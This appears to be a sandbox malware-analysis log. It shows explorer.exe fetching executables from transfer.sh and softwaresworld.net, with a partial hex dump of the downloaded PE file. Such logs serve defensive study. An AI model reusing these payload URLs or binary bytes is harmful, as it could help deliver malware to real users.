                                                                                                                                  2022-01-11 22:38:58 UTC546INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.549873144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:38:58 UTC546OUTGET /get/QbPlFD/G.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: transfer.sh
                                                                                                                                  2022-01-11 22:38:59 UTC546INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.14.2
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:59 GMT
                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                  Content-Length: 10
                                                                                                                                  Connection: close
                                                                                                                                  Retry-After: Tue, 11 Jan 2022 23:39:02 GMT
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-Made-With: <3 by DutchCoders
                                                                                                                                  X-Ratelimit-Key: 127.0.0.1,102.129.143.64,102.129.143.64
                                                                                                                                  X-Ratelimit-Limit: 10
                                                                                                                                  X-Ratelimit-Rate: 600
                                                                                                                                  X-Ratelimit-Remaining: 9
                                                                                                                                  X-Ratelimit-Reset: 1641940742
                                                                                                                                  X-Served-By: Proudly served by DutchCoders
                                                                                                                                  2022-01-11 22:38:59 UTC547INData Raw: 4e 6f 74 20 46 6f 75 6e 64 0a
                                                                                                                                  Data Ascii: Not Found


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.54987594.102.49.170443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:38:59 UTC547OUTGET /wp-content/uploads/2022/8a444287feca136d19310b76ef81e54fc12.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: softwaresworld.net
                                                                                                                                  2022-01-11 22:38:59 UTC547INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:59 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Last-Modified: Tue, 11 Jan 2022 18:32:18 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 752128
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  2022-01-11 22:38:59 UTC547INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db e7 80 7e 9f 86 ee 2d 9f 86 ee 2d 9f 86 ee 2d 81 d4 7b 2d 88 86 ee 2d 81 d4 6d 2d 19 86 ee 2d 81 d4 6a 2d b1 86 ee 2d b8 40 95 2d 98 86 ee 2d 9f 86 ef 2d 12 86 ee 2d 81 d4 64 2d 9e 86 ee 2d 81 d4 7a 2d 9e 86 ee 2d 81 d4 7f 2d 9e 86 ee 2d 52 69 63 68 9f 86 ee 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2c 33 52 60 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$~---{--m--j--@----d--z----Rich-PEL,3R`
                                                                                                                                  2022-01-11 22:38:59 UTC555INData Raw: 3b fe 74 0a 83 ff 01 74 05 83 ff 02 75 d2 ff 75 08 e8 10 28 00 00 59 89 75 fc 57 ff 75 0c ff 75 08 e8 16 ff ff ff 83 c4 0c 89 45 e4 c7 45 fc fe ff ff ff e8 09 00 00 00 8b 45 e4 e8 08 1d 00 00 c3 ff 75 08 e8 50 28 00 00 59 c3 8b ff 51 c7 01 f4 32 41 00 e8 7f 51 00 00 59 c3 8b ff 55 8b ec 56 8b f1 e8 e3 ff ff ff f6 45 08 01 74 07 56 e8 15 f9 ff ff 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 8b 45 08 83 c1 09 51 83 c0 09 50 e8 be 51 00 00 f7 d8 59 1b c0 59 40 5d c2 04 00 8b ff 55 8b ec 53 56 8b 75 08 57 33 ff 83 cb ff 3b f7 75 1c e8 7e 0d 00 00 57 57 57 57 57 c7 00 16 00 00 00 e8 06 0d 00 00 83 c4 14 0b c3 eb 42 f6 46 0c 83 74 37 56 e8 6d 4f 00 00 56 8b d8 e8 60 53 00 00 56 e8 b3 45 00 00 50 e8 87 52 00 00 83 c4 10 85 c0 7d 05 83 cb ff eb 11 8b 46 1c 3b c7 74 0a
                                                                                                                                  Data Ascii: ;ttuu(YuWuuEEEuP(YQ2AQYUVEtVY^]UEQPQYY@]USVuW3;u~WWWWWBFt7VmOV`SVEPR}F;t
                                                                                                                                  2022-01-11 22:38:59 UTC563INData Raw: 00 00 77 04 85 c0 74 de 5f 5d c3 8b ff 55 8b ec e8 a9 04 00 00 ff 75 08 e8 f6 02 00 00 ff 35 34 73 41 00 e8 f5 28 00 00 68 ff 00 00 00 ff d0 83 c4 0c 5d c3 8b ff 55 8b ec 68 28 33 41 00 ff 15 e0 30 41 00 85 c0 74 15 68 18 33 41 00 50 ff 15 60 30 41 00 85 c0 74 05 ff 75 08 ff d0 5d c3 8b ff 55 8b ec ff 75 08 e8 c8 ff ff ff 59 ff 75 08 ff 15 e8 30 41 00 cc 6a 08 e8 4e f2 ff ff 59 c3 6a 08 e8 6b f1 ff ff 59 c3 8b ff 55 8b ec 56 8b f0 eb 0b 8b 06 85 c0 74 02 ff d0 83 c6 04 3b 75 08 72 f0 5e 5d c3 8b ff 55 8b ec 56 8b 75 08 33 c0 eb 0f 85 c0 75 10 8b 0e 85 c9 74 02 ff d1 83 c6 04 3b 75 0c 72 ec 5e 5d c3 8b ff 55 8b ec 83 3d d4 3c 41 00 00 74 19 68 d4 3c 41 00 e8 5d 4e 00 00 59 85 c0 74 0a ff 75 08 ff 15 d4 3c 41 00 59 e8 06 4f 00 00 68 c8 31 41 00 68 ac 31 41
                                                                                                                                  Data Ascii: wt_]Uu54sA(h]Uh(3A0Ath3AP`0Atu]UuYu0AjNYjkYUVt;ur^]UVu3ut;ur^]U=<Ath<A]NYtu<AYOh1Ah1A
                                                                                                                                  2022-01-11 22:38:59 UTC571INData Raw: 0b e8 88 58 00 00 83 c4 10 eb 72 56 53 e8 14 5b 00 00 dd 45 08 59 59 eb 64 dd 45 08 53 dc 05 40 3a 41 00 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0b 6a 08 eb 3f e8 71 59 00 00 dd 5d f8 dd 45 08 59 dc 5d f8 59 df e0 f6 c4 44 7a 0e 56 53 e8 d2 5a 00 00 dd 45 f8 59 59 eb 22 f6 c3 20 75 ed dd 45 f8 53 83 ec 10 dd 5c 24 08 dd 45 08 dd 1c 24 6a 0b 6a 10 e8 69 58 00 00 83 c4 1c 5e 5b c9 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 54 24 0c 8b 4c 24 04 85 d2 74 69 33 c0 8a 44 24 08 84 c0 75 16 81 fa 00 01 00 00 72 0e 83 3d e4 17 4b 00 00 74 05 e9 b5 5b 00 00 57 8b f9 83 fa 04 72 31 f7 d9 83 e1 03 74 0c 2b d1 88 07 83 c7 01 83 e9 01 75 f6 8b c8 c1 e0 08 03 c1 8b c8 c1 e0 10 03 c1 8b ca 83 e2 03 c1 e9 02 74 06 f3 ab 85 d2 74 0a 88 07 83 c7 01 83 ea 01 75 f6 8b
                                                                                                                                  Data Ascii: XrVS[EYYdES@:A\$E$jj?qY]EY]YDzVSZEYY" uES\$E$jjiX^[T$L$ti3D$ur=Kt[Wr1t+uttu
                                                                                                                                  2022-01-11 22:38:59 UTC578INData Raw: 45 08 8b 00 8b 00 3d 4d 4f 43 e0 74 18 3d 63 73 6d e0 75 2b e8 d0 ec ff ff 83 a0 90 00 00 00 00 e9 63 9f ff ff e8 bf ec ff ff 83 b8 90 00 00 00 00 7e 0c e8 b1 ec ff ff 05 90 00 00 00 ff 08 33 c0 5d c3 6a 10 68 b0 58 41 00 e8 f4 be ff ff 8b 7d 10 8b 5d 08 81 7f 04 80 00 00 00 7f 06 0f be 73 08 eb 03 8b 73 08 89 75 e4 e8 7a ec ff ff 05 90 00 00 00 ff 00 83 65 fc 00 3b 75 14 74 65 83 fe ff 7e 05 3b 77 04 7c 05 e8 46 9f ff ff 8b c6 c1 e0 03 8b 4f 08 03 c8 8b 31 89 75 e0 c7 45 fc 01 00 00 00 83 79 04 00 74 15 89 73 08 68 03 01 00 00 53 8b 4f 08 ff 74 01 04 e8 50 0b 00 00 83 65 fc 00 eb 1a ff 75 ec e8 2d ff ff ff 59 c3 8b 65 e8 83 65 fc 00 8b 7d 10 8b 5d 08 8b 75 e0 89 75 e4 eb 96 c7 45 fc fe ff ff ff e8 19 00 00 00 3b 75 14 74 05 e8 da 9e ff ff 89 73 08 e8 86
                                                                                                                                  Data Ascii: E=MOCt=csmu+c~3]jhXA}]ssuze;ute~;w|FO1uEytshSOtPeu-Yee}]uuE;uts
                                                                                                                                  2022-01-11 22:38:59 UTC586INData Raw: 8b 43 04 85 c0 74 03 50 ff d6 83 c3 10 ff 4d 08 75 d6 8b 87 d4 00 00 00 05 b4 00 00 00 50 ff d6 5f 5e 5b 5d c3 8b ff 55 8b ec 57 8b 7d 08 85 ff 0f 84 83 00 00 00 53 56 8b 35 20 30 41 00 57 ff d6 8b 87 b0 00 00 00 85 c0 74 03 50 ff d6 8b 87 b8 00 00 00 85 c0 74 03 50 ff d6 8b 87 b4 00 00 00 85 c0 74 03 50 ff d6 8b 87 c0 00 00 00 85 c0 74 03 50 ff d6 8d 5f 50 c7 45 08 06 00 00 00 81 7b f8 70 7c 41 00 74 09 8b 03 85 c0 74 03 50 ff d6 83 7b fc 00 74 0a 8b 43 04 85 c0 74 03 50 ff d6 83 c3 10 ff 4d 08 75 d6 8b 87 d4 00 00 00 05 b4 00 00 00 50 ff d6 5e 5b 8b c7 5f 5d c3 85 ff 74 37 85 c0 74 33 56 8b 30 3b f7 74 28 57 89 38 e8 c1 fe ff ff 59 85 f6 74 1b 56 e8 45 ff ff ff 83 3e 00 59 75 0f 81 fe 78 7c 41 00 74 07 56 e8 59 fd ff ff 59 8b c7 5e c3 33 c0 c3 6a 0c 68
                                                                                                                                  Data Ascii: CtPMuP_^[]UW}SV5 0AWtPtPtPtP_PE{p|AttP{tCtPMuP^[_]t7t3V0;t(W8YtVE>Yux|AtVYY^3jh
                                                                                                                                  2022-01-11 22:38:59 UTC594INData Raw: 41 00 01 75 1d 2b cb 74 10 49 74 08 49 75 13 53 6a f4 eb 08 53 6a f5 eb 03 53 6a f6 ff 15 5c 31 41 00 8b 07 83 0c 06 ff 33 c0 eb 15 e8 c2 71 ff ff c7 00 09 00 00 00 e8 ca 71 ff ff 89 18 83 c8 ff 5f 5e 5b 5d c3 8b ff 55 8b ec 8b 45 08 83 f8 fe 75 18 e8 ae 71 ff ff 83 20 00 e8 93 71 ff ff c7 00 09 00 00 00 83 c8 ff 5d c3 56 33 f6 3b c6 7c 22 3b 05 c8 16 4b 00 73 1a 8b c8 83 e0 1f c1 f9 05 8b 0c 8d e0 16 4b 00 c1 e0 06 03 c1 f6 40 04 01 75 24 e8 6d 71 ff ff 89 30 e8 53 71 ff ff 56 56 56 56 56 c7 00 09 00 00 00 e8 db 70 ff ff 83 c4 14 83 c8 ff eb 02 8b 00 5e 5d c3 6a 0c 68 30 5b 41 00 e8 fa 7f ff ff 8b 7d 08 8b c7 c1 f8 05 8b f7 83 e6 1f c1 e6 06 03 34 85 e0 16 4b 00 c7 45 e4 01 00 00 00 33 db 39 5e 08 75 36 6a 0a e8 d7 74 ff ff 59 89 5d fc 39 5e 08 75 1a 68
                                                                                                                                  Data Ascii: Au+tItIuSjSjSj\1A3qq_^[]UEuq q]V3;|";KsK@u$mq0SqVVVVVp^]jh0[A}4KE39^u6jtY]9^uh
                                                                                                                                  2022-01-11 22:38:59 UTC602INData Raw: 44 0e 26 0a 53 8d 4d e8 51 ff 75 10 50 8b 07 ff 34 06 ff 15 88 31 41 00 85 c0 0f 84 7b 03 00 00 8b 4d e8 3b cb 0f 8c 70 03 00 00 3b 4d 10 0f 87 67 03 00 00 8b 07 01 4d f0 8d 44 06 04 f6 00 80 0f 84 e6 01 00 00 80 7d fe 02 0f 84 16 02 00 00 3b cb 74 0d 8b 4d f4 80 39 0a 75 05 80 08 04 eb 03 80 20 fb 8b 5d f4 8b 45 f0 03 c3 89 5d 10 89 45 f0 3b d8 0f 83 d0 00 00 00 8b 4d 10 8a 01 3c 1a 0f 84 ae 00 00 00 3c 0d 74 0c 88 03 43 41 89 4d 10 e9 90 00 00 00 8b 45 f0 48 3b c8 73 17 8d 41 01 80 38 0a 75 0a 41 41 89 4d 10 c6 03 0a eb 75 89 45 10 eb 6d ff 45 10 6a 00 8d 45 e8 50 6a 01 8d 45 ff 50 8b 07 ff 34 06 ff 15 88 31 41 00 85 c0 75 0a ff 15 58 30 41 00 85 c0 75 45 83 7d e8 00 74 3f 8b 07 f6 44 06 04 48 74 14 80 7d ff 0a 74 b9 c6 03 0d 8b 07 8a 4d ff 88 4c 06 05
                                                                                                                                  Data Ascii: D&SMQuP41A{M;p;MgMD};tM9u ]E]E;M<<tCAMEH;sA8uAAMuEmEjEPjEP41AuX0AuE}t?DHt}tML
                                                                                                                                  2022-01-11 22:38:59 UTC610INData Raw: 00 83 ca ff d3 e2 f7 d2 85 54 85 e0 eb 05 83 7c 85 e0 00 75 08 40 83 f8 03 7c f3 eb 66 8b c6 99 6a 1f 59 23 d1 03 c2 c1 f8 05 81 e6 1f 00 00 80 79 05 4e 83 ce e0 46 83 65 08 00 33 d2 2b ce 42 d3 e2 8d 4c 85 e0 8b 31 8d 3c 16 3b fe 72 04 3b fa 73 07 c7 45 08 01 00 00 00 89 39 8b 4d 08 eb 1f 85 c9 74 1e 8d 4c 85 e0 8b 11 8d 72 01 33 ff 3b f2 72 05 83 fe 01 73 03 33 ff 47 89 31 8b cf 48 79 de 8b 4d f0 83 c8 ff d3 e0 21 03 8b 45 f4 40 83 f8 03 7d 0d 6a 03 59 8d 7c 85 e0 2b c8 33 c0 f3 ab 8b 0d fc 81 41 00 41 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 f4 00 83 65 08 00 83 cf ff 8b ca d3 e7 c7 45 fc 20 00 00 00 29 55 fc f7 d7 8b 5d 08 8d 5c 9d e0 8b 33 8b ce 23 cf 89 4d f0 8b ca d3 ee 8b 4d fc 0b 75 f4 89 33 8b 75 f0 d3
                                                                                                                                  Data Ascii: T|u@|fjY#yNFe3+BL1<;r;sE9MtLr3;rs3G1HyM!E@}jY|+3AAyJBeeE )U]\3#MMu3u
                                                                                                                                  2022-01-11 22:38:59 UTC617INData Raw: 50 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4d f0 e9 d8 fb fe ff 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 72 0e ff ff b8 70 54 41 00 e9 0f 0b ff ff 8d 4d d8 e9 8a f0 fe ff 8b 54 24 08 8d 42 0c 8b 4a ac 33 c8 e8 4f 0e ff ff b8 ac 54 41 00 e9 ec 0a ff ff 8d 4d d8 e9 67 f0 fe ff 8b 54 24 08 8d 42 0c 8b 4a ac 33 c8 e8 2c 0e ff ff b8 30 55 41 00 e9 c9 0a ff ff 8b 4d f0 e9 6f fb fe ff 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 09 0e ff ff b8 88 55 41 00 e9 a6 0a ff ff 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 ee 0d ff ff b8 28 59 41 00 e9 8b 0a ff ff b8 d0 5c 41 00 e9 81 0a ff ff b8 5c 5d 41 00 e9 77 0a ff ff 8d 75 d8 e9 fc ef fe ff b8 88 5d 41 00 e9 65 0a ff ff 8d 4d d8 e9 e0 ef fe ff b8 b4 5d 41 00 e9 53 0a ff ff c7 05 48 c7 4a 00 20 32 41 00 b9 48 c7 4a 00 e9 ed
                                                                                                                                  Data Ascii: PMT$BJ3rpTAMT$BJ3OTAMgT$BJ3,0UAMoT$BJ3UAT$BJ3(YA\A\]Awu]AeM]ASHJ 2AHJ
                                                                                                                                  2022-01-11 22:38:59 UTC625INData Raw: d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 48 48 3a 6d 6d 3a 73 73 00 00 00 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 4d 4d 2f 64 64 2f 79 79 00 00 00 00 50 4d 00 00 41 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 63 68 00 00 00 46 65 62 72 75 61 72 79 00 00 00 00 4a 61 6e 75 61 72 79 00 44 65 63 00 4e 6f 76 00 4f 63 74 00 53 65 70 00 41 75 67 00 4a 75 6c 00 4a 75 6e 00 4d 61 79 00 41 70 72 00 4d 61 72 00 46 65 62 00 4a 61 6e 00 53 61 74 75 72 64 61 79 00 00 00 00
                                                                                                                                  Data Ascii: HH:mm:ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturday
                                                                                                                                  2022-01-11 22:38:59 UTC633INData Raw: 00 00 00 bc 35 41 00 1f 00 00 00 58 35 41 00 20 00 00 00 20 35 41 00 21 00 00 00 28 34 41 00 22 00 00 00 88 33 41 00 78 00 00 00 74 33 41 00 79 00 00 00 64 33 41 00 7a 00 00 00 54 33 41 00 fc 00 00 00 50 33 41 00 ff 00 00 00 40 33 41 00 00 18 4b 00 00 00 00 00 00 18 4b 00 01 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: 5AX5A 5A!(4A"3Axt3Ayd3AzT3AP3A@3AKK
                                                                                                                                  2022-01-11 22:38:59 UTC641INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC649INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC656INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC664INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC680INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC688INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC696INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-11 22:38:59 UTC703INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
